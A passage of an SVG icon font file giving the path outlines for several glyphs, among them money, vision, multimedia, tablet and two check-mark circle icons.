h70.585h77.9023v17.7969h-382.152zM296.305 8.59082c5.45215 -1.14648 9.55762 -5.99512 9.55762 -11.7842v-14.6816h56.0381v14.6816c0 5.78906 4.10645 10.6377 9.55859 11.7842v12.8018c0 6.63965 5.40137 12.041 12.042 12.041h1v146.149h-1
c-6.64062 0 -12.042 5.40234 -12.042 12.043v12.8008c-5.45215 1.14648 -9.55859 5.99512 -9.55859 11.7842v14.6826h-56.0381v-14.6826c0 -5.78906 -4.10449 -10.6377 -9.55762 -11.7842v-12.8008c0 -6.64062 -5.40234 -12.043 -12.042 -12.043h-1v-146.149h1
c6.63965 0 12.042 -5.40137 12.042 -12.041v-12.8018zM140.542 8.59082c5.45215 -1.14648 9.55859 -5.99512 9.55859 -11.7842v-14.6816h56.0391v14.6816c0 5.78906 4.10547 10.6377 9.55762 11.7842v12.8018c0 6.63965 5.40234 12.041 12.042 12.041h1v146.149h-1
c-6.63965 0 -12.042 5.40234 -12.042 12.043v12.8008c-5.45215 1.14648 -9.55762 5.99512 -9.55762 11.7842v14.6826h-56.0391v-14.6826c0 -5.78906 -4.10645 -10.6377 -9.55859 -11.7842v-12.8008c0 -6.64062 -5.40137 -12.043 -12.042 -12.043h-1v-146.149h1
c6.64062 0 12.042 -5.40137 12.042 -12.041v-12.8018zM275.989 18.8896c-4.0166 0 -7.27246 3.25586 -7.27246 7.27246v160.696c0 4.01758 3.25586 7.27344 7.27246 7.27344h5.76855v10.0381h-51.5137v-10.0381h5.76855c4.0166 0 7.27246 -3.25781 7.27246 -7.27441
v-160.695c0 -4.0166 -3.25586 -7.27246 -7.27246 -7.27246h-5.76855v-10.915h51.5137v10.915h-5.76855zM222.971 218.716h66.0283c0.00488281 0 0.0107422 -0.000976562 0.015625 -0.000976562s0.0107422 0.000976562 0.015625 0.000976562h2.28516v12.1777h-70.6299
v-12.1777h2.25293h0.0322266zM220.686 -6.21387v-11.6602h70.6299v11.6846c-0.728516 -0.245117 -1.50684 -0.384766 -2.31738 -0.384766h-66.0596c-0.787109 0 -1.54297 0.128906 -2.25293 0.360352zM67.21 218.716h66.0596h2.28516h0.000976562v12.1777h-70.6309v-12.1777
h2.28516zM64.9238 -6.20215v-11.6719h70.6309v11.6719c-0.719727 -0.237305 -1.48633 -0.37207 -2.28516 -0.37207h-66.0605c-0.798828 0 -1.56543 0.134766 -2.28516 0.37207zM487.422 -32.4551l-462.808 0.0341797l-0.0351562 -15.334l462.808 -0.0341797
c0.0117188 0 0.015625 0.000976562 0.015625 0.000976562zM444.771 -6.57324h-66.0586c-0.791992 0 -1.55176 0.129883 -2.26562 0.364258v-11.665h70.6309v11.6797c-0.726562 -0.241211 -1.49902 -0.378906 -2.30664 -0.378906zM391.772 194.131
c4.01758 0 7.27344 -3.25684 7.27344 -7.27344v-160.696c0 -4.0166 -3.25586 -7.27344 -7.27344 -7.27344h-5.76758v-10.915h51.5127v10.915h-5.76758c-4.01758 0 -7.27344 3.25781 -7.27344 7.27441v160.696c0 4.01758 3.25586 7.27344 7.27344 7.27344h5.76758v10.0381
h-51.5127v-10.0391h5.76758zM447.078 218.716v12.1777h-70.6309v-12.1777h2.26562h0.0195312h66.0391c0.00292969 0 0.0078125 -0.000976562 0.0107422 -0.000976562s0.00683594 0.000976562 0.00976562 0.000976562h2.28613v0zM259.076 334.835
c9.73145 -3.5791 20.3574 -8.50098 20.3574 -23.7129c0 -13.7588 -8.27734 -21.3643 -20.3574 -23.041v-3.80371c0 -1.3418 -1.67773 -2.57227 -3.35449 -2.57227c-1.90234 0 -3.24414 1.22949 -3.24414 2.57227v3.46875v0
c-13.8701 0.223633 -23.2646 7.71777 -23.2646 13.1982c0 2.68555 2.34863 6.37598 5.14453 6.37598c3.69141 0 6.71094 -7.83008 18.1201 -8.72363v26.2832c-10.0664 3.5791 -21.252 7.60547 -21.252 21.9229c0 14.0928 10.626 19.6865 21.252 20.8037v3.24414
c0 1.3418 1.3418 2.57324 3.24414 2.57324c1.67773 0 3.35449 -1.22949 3.35449 -2.57324v-3.01953c7.60645 -0.224609 18.3447 -2.57324 18.3447 -8.05371c0 -2.125 -1.56641 -6.375 -4.92285 -6.375c-2.68359 0 -5.5918 3.5791 -13.4219 4.13867v-22.7061zM253.149 336.96
v20.3564c-6.26367 -0.782227 -10.7383 -3.57812 -10.7383 -9.39453c0 -6.37598 4.80957 -8.72461 10.7383 -10.9619zM258.406 298.818c6.04004 1.11816 9.84375 4.69824 9.84375 11.0732c-0.00195312 7.04688 -4.36328 10.1787 -9.84375 12.5283v-23.6016z" />
    <glyph glyph-name="041-money" unicode="&#xf125;" 
d="M77.4297 41.3096c0 5.52344 4.47754 10 10 10c5.52344 0 10 -4.47656 10 -10c0 -5.52246 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10zM460.4 160.56c0 5.52344 4.47656 10 10 10c5.52246 0 10 -4.47656 10 -10c0 -5.52246 -4.47754 -10 -10 -10
c-5.52344 0 -10 4.47754 -10 10zM354.647 235.656c15.8809 0 28.8018 -12.9199 28.8018 -28.8008v-8.93262c0 -15.0977 -11.6816 -27.5107 -26.4795 -28.6992v-8.66895c0 -5.52148 -4.47754 -10 -10 -10c-5.52148 0 -10 4.47852 -10 10v8.58398
c-14.6602 0.356445 -26.4785 12.3838 -26.4785 27.127c0 5.52246 4.47754 10 10 10c5.52148 0 10 -4.47754 10 -10c0 -3.93945 3.20605 -7.14355 7.14453 -7.14355h17.0127c4.85352 0 8.80176 3.94824 8.80176 8.80078v8.93262c0 4.85254 -3.94824 8.80078 -8.80176 8.80078
h-5.79785h-3.76074h-5.79688c-15.8809 0 -28.8018 12.9209 -28.8018 28.8018v8.93066c0 15.0986 11.6807 27.5127 26.4785 28.7002v8.66895c0 5.52246 4.47852 10 10 10c5.52246 0 10 -4.47754 10 -10v-8.58398c14.6611 -0.355469 26.4795 -12.3838 26.4795 -27.127
c0 -5.52148 -4.47852 -10 -10 -10c-5.52246 0 -10 4.47852 -10 10c0 3.94043 -3.20605 7.14453 -7.14551 7.14453h-17.0117c-4.85254 0 -8.80078 -3.94824 -8.80176 -8.80273v-8.93066c0 -4.85449 3.94824 -8.80176 8.80176 -8.80176h5.79688h3.76074h5.79785z
M499.899 108.991c4.11328 -9.31934 4.35254 -19.6836 0.672852 -29.1826c-3.68066 -9.49902 -10.8398 -16.9971 -20.1592 -21.1104l-128.9 -56.9141c-25.7783 -11.3809 -55.0381 -10.7178 -80.2764 1.81738l-47.1855 23.4424
c-19.8994 9.88867 -42.9736 10.4121 -63.3008 1.43457l-0.865234 -0.381836c1.36035 -5.0498 1.08594 -10.3828 -0.838867 -15.3516c-2.35547 -6.08203 -6.90723 -10.9023 -12.833 -13.6006l-122.873 -62.0703c-1.4209 -0.717773 -2.9668 -1.07422 -4.50879 -1.07422
c-1.82129 0 -3.63672 0.49707 -5.24023 1.48242c-2.95801 1.82031 -4.75977 5.04492 -4.75977 8.51758v169.846c0 3.97168 2.34863 7.56543 5.98633 9.15918l63.29 27.7334c6.03027 2.66309 12.7656 2.81836 18.9375 0.426758
c4.80664 -1.8623 8.80859 -5.1084 11.6152 -9.30664l48.9902 21.6299c15.5078 6.84668 32.0098 10.2021 48.5293 10.0459v53.3594c0 58.0967 41.9033 106.582 97.0723 116.841v30.0381l-24.8809 44.8662c-1.40332 2.53027 -1.64062 5.54199 -0.655273 8.26172
c0.988281 2.71875 3.10352 4.87793 5.80078 5.91895l32.4287 12.5107c2.35547 0.907227 4.9668 0.891602 7.31152 -0.0439453l20.3965 -8.15332l22.9951 8.27637c2.4502 0.881836 5.14941 0.772461 7.52246 -0.305664l30.9902 -14.0791
c2.57715 -1.17188 4.53613 -3.37988 5.39355 -6.07617c0.858398 -2.69727 0.532227 -5.63184 -0.896484 -8.0752l-25.2676 -43.2217v-30.123c54.6436 -10.6807 96.0088 -58.915 96.0088 -116.637v-26.0605c0 -5.52246 -4.47852 -10 -10 -10c-5.52246 0 -10 4.47754 -10 10
v26.0605c0 54.5049 -44.3438 98.8477 -98.8486 98.8477h-36.5234c-54.5039 0 -98.8477 -44.3428 -98.8477 -98.8477v-55.2764c6.56641 -1.20605 13.0723 -2.97754 19.4541 -5.32129l94.8848 -34.8447c18.5986 -6.8291 28.5127 -27.6357 22.0996 -46.3818
c-5.20996 -15.2285 -19.5332 -24.8486 -34.8164 -24.8486c-3.88965 0 -7.84082 0.623047 -11.7207 1.93652l-73.375 24.8174c-5.23242 1.77051 -8.03906 7.44531 -6.26953 12.6777c1.77051 5.23145 7.44434 8.03906 12.6777 6.26855l73.375 -24.8184
c8.71387 -2.94629 18.2266 1.73633 21.2051 10.4404c2.92285 8.54102 -1.59473 18.0234 -10.0693 21.1348l-94.8848 34.8457c-23.8428 8.75488 -49.7734 7.92871 -73.0127 -2.33203l-48.6279 -21.4707l34.9736 -79.21l0.599609 0.264648
c25.7793 11.3848 55.0391 10.7197 80.2773 -1.81934l47.1846 -23.4414c19.9043 -9.8877 42.9756 -10.4102 63.3008 -1.43457l128.9 56.9141c4.43262 1.95703 7.83691 5.52148 9.58789 10.041c1.75 4.51758 1.63672 9.44531 -0.321289 13.8789
c-1.95605 4.43262 -5.52148 7.83691 -10.0391 9.58789c-4.49609 1.73926 -9.39844 1.63574 -13.8135 -0.291016l-62.9082 -29.0107c-5.01367 -2.31152 -10.9561 -0.12207 -13.2686 4.89355s-0.12207 10.9561 4.89355 13.2695l62.9893 29.0479
c0.0478516 0.0214844 0.0976562 0.0449219 0.147461 0.0654297c9.31934 4.11719 19.6846 4.35547 29.1836 0.675781c9.49902 -3.68066 16.9971 -10.8408 21.1123 -20.1592zM364.391 347.741v20.6182h-41.1387v-20.6182h1.77539h36.5234h2.83984zM301.431 420.296
l17.71 -31.9346h49.5127l18.1455 31.04l-17.2012 7.81445l-22.7441 -8.18652c-2.30078 -0.830078 -4.82617 -0.785156 -7.09863 0.123047l-20.2744 8.10449zM137.868 17.3223c2.41406 1.06543 3.50879 3.89551 2.44141 6.30957l-45.5459 103.154l-0.00292969 0.00585938
s-0.000976562 0.00390625 -0.00195312 0.00585938l-2.29199 5.19043c-0.695312 1.57715 -1.95801 2.25977 -2.64648 2.52734c-0.691406 0.268555 -2.08594 0.610352 -3.66113 -0.0839844l-57.3291 -25.1221v-84.249l19.2988 9.47656
c4.95898 2.43555 10.9492 0.388672 13.3838 -4.56934c2.43457 -4.95703 0.389648 -10.9492 -4.56836 -13.3838l-28.1133 -13.8047v-40.5244l108.567 54.8438c0.154297 0.078125 0.311523 0.15332 0.469727 0.223633z" />
    <glyph glyph-name="071-vision" unicode="&#xf141;" 
d="M180.436 109.741c2.61816 3.22754 7.3584 3.71875 10.584 1.10059c18.3008 -14.8535 41.3779 -23.0342 64.9814 -23.0342c56.8984 0 103.189 46.291 103.189 103.189c0 56.8975 -46.291 103.188 -103.189 103.188s-103.189 -46.2891 -103.189 -103.188
c0 -20.8711 6.20215 -40.9766 17.9365 -58.1465c2.34473 -3.43164 1.46387 -8.1123 -1.96777 -10.458c-3.42871 -2.34277 -8.1123 -1.46484 -10.458 1.96777c-13.4492 19.6807 -20.5596 42.7227 -20.5596 66.6367c0 65.1963 53.042 118.237 118.238 118.237
s118.238 -53.041 118.238 -118.237s-53.042 -118.238 -118.238 -118.238c-27.0479 0 -53.4932 9.37402 -74.4648 26.3984c-3.22656 2.61914 -3.71973 7.3584 -1.10059 10.584zM296.229 166.28c-3.15527 2.70508 -3.52051 7.45605 -0.819336 10.6074l14.7588 17.2197
h-108.498l49.5225 -58.5996c1.4873 -1.75781 3.36719 -2.02637 4.35547 -2.0293h0.0195312c0.993164 0 2.8623 0.262695 4.35156 2l14.6182 17.0557c2.70312 3.1543 7.45312 3.52246 10.6094 0.81543c3.1543 -2.70312 3.51953 -7.4541 0.81543 -10.6094l-14.6182 -17.0547
c-3.95605 -4.61426 -9.70117 -7.25586 -15.7764 -7.25586h-0.0732422c-6.10059 0.0214844 -11.8584 2.70605 -15.7959 7.36621l-52.9004 62.5986c-6.79102 8.03613 -6.49805 19.8965 0.681641 27.5879l22.1611 23.7461c3.91797 4.19531 9.4541 6.60059 15.1914 6.60059
h62.335c5.7373 0 11.2744 -2.40527 15.1904 -6.59961l22.1064 -23.6855c7.22852 -7.74414 7.48047 -19.6514 0.586914 -27.6982l-18.2129 -21.249c-2.7041 -3.15234 -7.4541 -3.52148 -10.6094 -0.816406zM220.644 229.461l-18.9482 -20.3018h108.61l-18.9492 20.3027
c-1.07812 1.15625 -2.60645 1.81934 -4.18848 1.81934h-62.335c-1.58203 0 -3.11035 -0.663086 -4.18945 -1.82031zM492.615 64.2539c10.6885 0 19.3848 -8.69531 19.3818 -19.3838v-20.0859c0 -10.6875 -8.69629 -19.3838 -19.3848 -19.3838h-20.0859
c-10.6875 0 -19.3838 8.69629 -19.3838 19.3838v2.51953h-170.387c-3.29004 -11.6846 -14.0361 -20.2764 -26.7578 -20.2764c-12.7334 0 -23.4863 8.60645 -26.7666 20.3057c-39.7744 5.93359 -80.6611 24.9238 -121.628 56.5254
c-35.3857 27.2969 -63.3555 58.2793 -80.5889 79.4629c-13.0459 16.0371 -13.0459 39.3174 0 55.3535c17.2354 21.1865 45.209 52.1719 80.5977 79.4688c24.873 19.1855 49.7148 33.7158 74.2969 43.5059h-123.055v-2.51855c0 -10.6885 -8.69629 -19.3838 -19.3838 -19.3838
h-20.0859c-10.6885 0 -19.3848 8.69531 -19.3848 19.3838v20.0859c0 10.6875 8.69629 19.3838 19.3848 19.3848h20.0869c10.6875 0 19.3838 -8.69629 19.3838 -19.3838v-2.51953h170.384c3.29004 11.6846 14.0352 20.2764 26.7578 20.2764
c13.4766 0 24.7393 -9.63867 27.2676 -22.3828c29.5889 -4.50391 59.9932 -16.3164 90.4785 -35.1689c3.53516 -2.18555 4.62891 -6.82324 2.44336 -10.3564c-1.42383 -2.30176 -3.88672 -3.56934 -6.40723 -3.56934c-1.35156 0 -2.71777 0.363281 -3.9502 1.12598
c-28.3779 17.5498 -56.5176 28.5928 -83.7559 32.9121c-3.92773 -10.5938 -14.1328 -18.1631 -26.0752 -18.1631c-11.9463 0 -22.1562 7.5752 -26.0801 18.1738c-36.7275 -5.81055 -74.7432 -23.7207 -113.114 -53.3184
c-34.2461 -26.417 -61.3809 -56.4814 -78.1143 -77.0508c-8.57031 -10.5342 -8.57031 -25.8262 0 -36.3613c16.7305 -20.5654 43.8623 -50.627 78.1064 -77.042c38.1572 -29.4346 75.9639 -47.3135 112.501 -53.2275c3.35449 11.585 14.0508 20.082 26.7021 20.082
s23.3477 -8.49707 26.7021 -20.082c36.5361 5.91406 74.3438 23.793 112.501 53.2275c34.2441 26.415 61.376 56.4766 78.1064 77.042c8.57031 10.5352 8.57031 25.8271 0 36.3623c-17.3906 21.377 -45.5889 52.502 -81.1689 79.3789
c-3.31641 2.50488 -3.97363 7.22363 -1.46875 10.5391s7.22266 3.97461 10.5391 1.46875c36.7812 -27.7852 65.8584 -59.8691 83.7734 -81.8896c13.0449 -16.0381 13.0449 -39.3184 0 -55.3545c-17.2334 -21.1836 -45.2031 -52.166 -80.5889 -79.4629
c-23.2275 -17.918 -46.4297 -31.7754 -69.418 -41.5059h118.169v2.51855c0 10.6885 8.69629 19.3838 19.3838 19.3838h20.0859zM43.8066 339.13h-0.000976562v20.0869c0 2.39062 -1.94434 4.33496 -4.33496 4.33496h-20.0859c-2.3916 0 -4.33594 -1.94434 -4.33594 -4.33496
v-20.0869c0 -2.3916 1.94434 -4.33594 4.33594 -4.33594h20.0869c2.39062 0 4.33496 1.94434 4.33496 4.33594zM256 361.925c-7.03223 0 -12.752 -5.71973 -12.75 -12.752c0 -0.275391 0.0234375 -0.544922 0.0410156 -0.816406
c0.00585938 -0.113281 0.015625 -0.227539 0.0166016 -0.34082c0.587891 -6.49121 6.05273 -11.5947 12.6934 -11.5947s12.1055 5.10449 12.6934 11.5947c0.000976562 0.112305 0.0107422 0.226562 0.0166016 0.34082
c0.0175781 0.271484 0.0410156 0.541016 0.0410156 0.816406c0 7.03223 -5.71973 12.752 -12.752 12.752zM256 22.0752c6.81738 0 12.3857 5.38184 12.7197 12.1182c0.00195312 0.0419922 -0.00292969 0.0830078 -0.00195312 0.125
c0.0078125 0.182617 0.0175781 0.362305 0.0302734 0.541992l0.000976562 0.0185547c-0.0273438 7.00781 -5.73535 12.7002 -12.749 12.7002s-12.7197 -5.69238 -12.749 -12.7002l0.000976562 -0.0185547c0.0117188 -0.180664 0.0224609 -0.359375 0.0302734 -0.541992
c0.00195312 -0.0419922 -0.00390625 -0.0830078 -0.00195312 -0.125c0.333984 -6.73633 5.90234 -12.1182 12.7197 -12.1182zM496.951 24.7832v20.0859c0 2.3916 -1.94434 4.33496 -4.33594 4.33496h-20.0859c-2.39062 0 -4.33496 -1.94336 -4.33496 -4.33496v-20.0859
c0 -2.39062 1.94434 -4.33496 4.33496 -4.33496h20.0859c2.3916 0 4.33594 1.94434 4.33594 4.33496z" />
    <glyph glyph-name="063-null-1" unicode="&#xf139;" 
d="M75.2891 11.2881c-23.459 23.459 -41.8809 50.7861 -54.7549 81.2236c-13.3359 31.5312 -20.0986 65.0039 -20.0986 99.4873c0 34.4854 6.7627 67.958 20.0977 99.4893c12.875 30.4365 31.2969 57.7646 54.7559 81.2227c23.458 23.458 50.7852 41.8799 81.2227 54.7539
c31.5312 13.3369 65.0039 20.0986 99.4883 20.0986c34.4834 0 67.9561 -6.76172 99.4883 -20.0986c30.4375 -12.874 57.7646 -31.2949 81.2236 -54.7539c23.458 -23.459 41.8809 -50.7861 54.7539 -81.2236c13.3359 -31.5303 20.0996 -65.0029 20.0996 -99.4883
c0 -34.4824 -6.76367 -67.9561 -20.0996 -99.4873c-12.873 -30.4375 -31.2959 -57.7646 -54.7539 -81.2236c-23.459 -23.458 -50.7871 -41.8789 -81.2236 -54.7539c-31.5312 -13.3359 -65.0049 -20.0977 -99.4883 -20.0977c-34.4844 0 -67.957 6.76172 -99.4883 20.0977
c-30.4375 12.875 -57.7646 31.2959 -81.2227 54.7539zM256 410.255c-120.54 0 -218.256 -97.7158 -218.256 -218.256c0 -120.539 97.7158 -218.254 218.256 -218.254s218.255 97.7148 218.255 218.254c0 120.54 -97.7148 218.256 -218.255 218.256zM256 -63.999
c-34.5449 0 -68.0742 6.77344 -99.6582 20.1318c-30.4902 12.8975 -57.8633 31.3506 -81.3604 54.8477c-23.499 23.5 -41.9521 50.874 -54.8477 81.3623c-13.3604 31.5859 -20.1338 65.1152 -20.1338 99.6562c0 34.542 6.77344 68.0723 20.1328 99.6592
c12.8955 30.4883 31.3496 57.8613 54.8477 81.3604s50.8721 41.9521 81.3604 54.8477c31.5869 13.3594 65.1162 20.1328 99.6582 20.1328c34.5449 0 68.0742 -6.77344 99.6572 -20.1338c30.4893 -12.8955 57.8623 -31.3496 81.3623 -54.8477
c23.5 -23.5 41.9531 -50.874 54.8477 -81.3604c13.3604 -31.5869 20.1338 -65.1162 20.1338 -99.6582c0 -34.541 -6.77344 -68.0703 -20.1338 -99.6572c-12.8945 -30.4873 -31.3467 -57.8604 -54.8477 -81.3623c-23.498 -23.4961 -50.8721 -41.9492 -81.3623 -54.8477
c-31.583 -13.3574 -65.1123 -20.1309 -99.6562 -20.1309zM256 447.128c-34.4248 0 -67.8398 -6.75 -99.3184 -20.0635c-30.3848 -12.8516 -57.666 -31.2422 -81.085 -54.6611c-23.4199 -23.4199 -41.8096 -50.7002 -54.6611 -81.084
c-13.3145 -31.4795 -20.0645 -64.8955 -20.0645 -99.3203c0 -34.4229 6.75 -67.8398 20.0645 -99.3184c12.8516 -30.3848 31.2412 -57.665 54.6611 -81.085c23.418 -23.417 50.6982 -41.8076 81.085 -54.6602c31.4746 -13.3135 64.8906 -20.0635 99.3184 -20.0635
s67.8428 6.75 99.3184 20.0635c30.3857 12.8525 57.667 31.2432 81.085 54.6602c23.4209 23.4229 41.8096 50.7031 54.6602 81.085c13.3145 31.4785 20.0654 64.8945 20.0654 99.3184c0 34.4248 -6.75098 67.8408 -20.0654 99.3193
c-12.8496 30.3818 -31.2393 57.6621 -54.6602 81.084c-23.4199 23.4189 -50.7012 41.8096 -81.085 54.6611c-31.4766 13.3145 -64.8926 20.0645 -99.3184 20.0645zM256 -26.6904c-58.4141 0 -113.333 22.7471 -154.638 64.0527
c-41.3057 41.3057 -64.0537 96.2227 -64.0537 154.637s22.7471 113.333 64.0537 154.639c41.3047 41.3047 96.2236 64.0527 154.638 64.0527s113.332 -22.748 154.638 -64.0527c41.3057 -41.3066 64.0527 -96.2246 64.0527 -154.639s-22.7471 -113.332 -64.0527 -154.637
c-41.3057 -41.3057 -96.2246 -64.0527 -154.638 -64.0527zM256 409.819c-58.1816 0 -112.881 -22.6572 -154.022 -63.7979c-41.1406 -41.1416 -63.7979 -95.8408 -63.7979 -154.022s22.6572 -112.881 63.7979 -154.021c41.1406 -41.1406 95.8408 -63.7979 154.022 -63.7979
s112.881 22.6572 154.021 63.7979c41.1406 41.1396 63.7979 95.8398 63.7979 154.021c0 58.1816 -22.6572 112.882 -63.7979 154.022c-41.1416 41.1416 -95.8398 63.7979 -154.021 63.7979zM199.425 98.9561l-72.9375 72.9375c-7.28516 7.28516 -7.28516 19.0967 0 26.3809
c7.28418 7.28613 19.0957 7.28613 26.3799 0l59.748 -59.748l146.517 146.517c7.28418 7.28613 19.0967 7.28516 26.3809 0c7.28516 -7.28418 7.28516 -19.0957 0 -26.3809l-159.707 -159.706c-3.49805 -3.49805 -8.24219 -5.46289 -13.1904 -5.46289
c-4.94727 0 -9.69238 1.96387 -13.1904 5.46289zM212.615 93.0576c-5.09863 0 -9.89355 1.98535 -13.499 5.59082l-72.9375 72.9385c-7.44238 7.44336 -7.44238 19.5537 0 26.9971c3.60547 3.60645 8.39941 5.5918 13.498 5.5918c5.09961 0 9.89258 -1.98535 13.499 -5.5918
l59.4404 -59.4404l146.208 146.209c3.60547 3.60645 8.39941 5.59082 13.499 5.59082c5.09766 0 9.8916 -1.98535 13.498 -5.59082s5.5918 -8.39941 5.5918 -13.499c0 -5.09863 -1.98535 -9.89258 -5.5918 -13.498l-159.707 -159.707
c-3.60449 -3.60547 -8.39941 -5.59082 -13.499 -5.59082zM139.677 203.304c-4.86621 0 -9.44043 -1.89453 -12.8818 -5.33691c-7.10254 -7.10352 -7.10254 -18.6611 0 -25.7646l72.9385 -72.9375c3.44043 -3.44141 8.01562 -5.33594 12.8818 -5.33594
c4.86719 0 9.44238 1.89453 12.8828 5.33594l159.707 159.706c3.44043 3.44141 5.33691 8.0166 5.33691 12.8818c0 4.86621 -1.89648 9.44238 -5.33691 12.8828c-3.44141 3.44238 -8.0166 5.33594 -12.8828 5.33594c-4.86719 0 -9.44238 -1.89453 -12.8838 -5.33594
l-146.823 -146.824l-60.0557 60.0557c-3.44141 3.44238 -8.01562 5.33691 -12.8828 5.33691z" />
    <glyph glyph-name="056-multimedia" unicode="&#xf132;" 
d="M384 320c70.6553 0 128 -57.3438 128 -127.999c0 -70.6562 -57.3447 -128.001 -128 -128.001h-102.399v48.6396h102.399c43.7754 0 79.3594 35.585 79.3594 79.3613c0 43.7754 -35.584 79.3594 -79.3594 79.3594h-102.399v48.6396h102.399zM48.6396 192.001
c0 -43.7764 35.585 -79.3613 79.3604 -79.3613h102.399v-48.6396h-102.399c-70.6553 0 -128 57.3447 -128 128.001c0 70.6553 57.3447 127.999 128 127.999h102.399v-48.6396h-102.4c-43.7764 0 -79.3594 -35.584 -79.3594 -79.3594zM153.6 166.399v51.2012h204.801
v-51.2012h-204.801z" />
    <glyph glyph-name="066-tablet" unicode="&#xf13c;" 
d="M486.4 448c14.1387 0 25.5996 -11.4609 25.5996 -25.5996v-204.801c0 -14.1387 -11.4609 -25.5996 -25.5996 -25.5996h-108.152l12.1865 -42.667h44.7656c4.71191 0 8.5332 -3.82031 8.5332 -8.5332c0 -4.71191 -3.82129 -8.5332 -8.5332 -8.5332h-93.8672v-93.8662
h8.5332c4.71289 0 8.53418 -3.82129 8.53418 -8.53418v-0.0849609c-0.0234375 -23.54 -19.127 -42.6045 -42.667 -42.5811h-273.066c-23.5527 0.0273438 -42.6396 19.1143 -42.667 42.666c0 4.71289 3.82031 8.53418 8.5332 8.53418h8.5332v170.666
c0 14.1387 11.4619 25.6006 25.6006 25.6006h110.933v187.733c0 14.1387 11.4619 25.5996 25.6006 25.5996h307.2zM34.1338 209.066v-170.666h119.466c4.71289 0 8.53418 -3.82129 8.53418 -8.53418h34.1328c0 4.71289 3.82129 8.53418 8.5332 8.53418h119.467v170.666
c0 4.71289 -3.82031 8.5332 -8.5332 8.5332h-273.066c-4.71289 0 -8.5332 -3.82031 -8.5332 -8.5332zM333.893 11.793c2.66699 2.7041 4.70996 5.96094 5.98145 9.54004h-126.541c0 -4.71191 -3.82031 -8.5332 -8.5332 -8.5332h-51.2002
c-4.71191 0 -8.5332 3.82129 -8.5332 8.5332h-126.541c3.62988 -10.2207 13.2949 -17.0537 24.1416 -17.0664h273.066c6.80957 0.00976562 13.3389 2.71582 18.1592 7.52637zM341.333 149.333h31.3516l-12.1855 42.667h-19.166v-42.667zM494.934 217.6v204.801
c0 4.71191 -3.82129 8.5332 -8.5332 8.5332h-307.2c-4.71289 0 -8.5332 -3.82129 -8.5332 -8.5332v-187.733h145.066c14.1387 0 25.5996 -11.4619 25.5996 -25.6006h145.067c4.71191 0 8.5332 3.82129 8.5332 8.5332zM469.333 123.733
c14.1387 0 25.6006 -11.4609 25.6006 -25.5996v-136.534c0 -14.1387 -11.4619 -25.5996 -25.6006 -25.5996h-68.2666c-14.1387 0 -25.5996 11.4609 -25.5996 25.5996v136.534c0 14.1387 11.4609 25.5996 25.5996 25.5996h68.2666zM477.866 -38.4004v136.534
c0 4.71191 -3.82031 8.5332 -8.5332 8.5332h-68.2666c-4.71191 0 -8.5332 -3.82129 -8.5332 -8.5332v-136.534c0 -4.71191 3.82129 -8.5332 8.5332 -8.5332h68.2666c4.71289 0 8.5332 3.82129 8.5332 8.5332z" />
    <glyph glyph-name="064-null-2" unicode="&#xf13a;" 
d="M75.2891 11.2881c-23.459 23.459 -41.8809 50.7861 -54.7549 81.2236c-13.3359 31.5312 -20.0986 65.0039 -20.0986 99.4873c0 34.4854 6.7627 67.958 20.0977 99.4893c12.875 30.4365 31.2969 57.7646 54.7559 81.2227c23.458 23.458 50.7852 41.8799 81.2227 54.7539
c31.5312 13.3369 65.0039 20.0986 99.4883 20.0986c34.4834 0 67.9561 -6.76172 99.4883 -20.0986c30.4375 -12.874 57.7646 -31.2949 81.2236 -54.7539c23.458 -23.459 41.8809 -50.7861 54.7539 -81.2236c13.3359 -31.5303 20.0996 -65.0029 20.0996 -99.4883
c0 -34.4824 -6.76367 -67.9561 -20.0996 -99.4873c-12.873 -30.4375 -31.2959 -57.7646 -54.7539 -81.2236c-23.459 -23.458 -50.7871 -41.8789 -81.2236 -54.7539c-31.5312 -13.3359 -65.0049 -20.0977 -99.4883 -20.0977c-34.4844 0 -67.957 6.76172 -99.4883 20.0977
c-30.4375 12.875 -57.7646 31.2959 -81.2227 54.7539zM256 410.255c-120.54 0 -218.256 -97.7158 -218.256 -218.256c0 -120.539 97.7158 -218.254 218.256 -218.254s218.255 97.7148 218.255 218.254c0 120.54 -97.7148 218.256 -218.255 218.256zM256 -63.999
c-34.5449 0 -68.0742 6.77344 -99.6582 20.1318c-30.4902 12.8975 -57.8633 31.3506 -81.3604 54.8477c-23.499 23.5 -41.9521 50.874 -54.8477 81.3623c-13.3604 31.5859 -20.1338 65.1152 -20.1338 99.6562c0 34.542 6.77344 68.0723 20.1328 99.6592
c12.8955 30.4883 31.3496 57.8613 54.8477 81.3604s50.8721 41.9521 81.3604 54.8477c31.5869 13.3594 65.1162 20.1328 99.6582 20.1328c34.5449 0 68.0742 -6.77344 99.6572 -20.1338c30.4893 -12.8955 57.8623 -31.3496 81.3623 -54.8477
c23.5 -23.5 41.9531 -50.874 54.8477 -81.3604c13.3604 -31.5869 20.1338 -65.1162 20.1338 -99.6582c0 -34.541 -6.77344 -68.0703 -20.1338 -99.6572c-12.8945 -30.4873 -31.3467 -57.8604 -54.8477 -81.3623c-23.498 -23.4961 -50.8721 -41.9492 -81.3623 -54.8477
c-31.583 -13.3574 -65.1123 -20.1309 -99.6562 -20.1309zM256 447.128c-34.4248 0 -67.8398 -6.75 -99.3184 -20.0635c-30.3848 -12.8516 -57.666 -31.2422 -81.085 -54.6611c-23.4199 -23.4199 -41.8096 -50.7002 -54.6611 -81.084
c-13.3145 -31.4795 -20.0645 -64.8955 -20.0645 -99.3203c0 -34.4229 6.75 -67.8398 20.0645 -99.3184c12.8516 -30.3848 31.2412 -57.665 54.6611 -81.085c23.418 -23.417 50.6982 -41.8076 81.085 -54.6602c31.4746 -13.3135 64.8906 -20.0635 99.3184 -20.0635
s67.8428 6.75 99.3184 20.0635c30.3857 12.8525 57.667 31.2432 81.085 54.6602c23.4209 23.4229 41.8096 50.7031 54.6602 81.085c13.3145 31.4785 20.0654 64.8945 20.0654 99.3184c0 34.4248 -6.75098 67.8408 -20.0654 99.3193
c-12.8496 30.3818 -31.2393 57.6621 -54.6602 81.084c-23.4199 23.4189 -50.7012 41.8096 -81.085 54.6611c-31.4766 13.3145 -64.8926 20.0645 -99.3184 20.0645zM256 -26.6904c-58.4141 0 -113.333 22.7471 -154.638 64.0527
c-41.3057 41.3057 -64.0537 96.2227 -64.0537 154.637s22.7471 113.333 64.0537 154.639c41.3047 41.3047 96.2236 64.0527 154.638 64.0527s113.332 -22.748 154.638 -64.0527c41.3057 -41.3066 64.0527 -96.2246 64.0527 -154.639s-22.7471 -113.332 -64.0527 -154.637
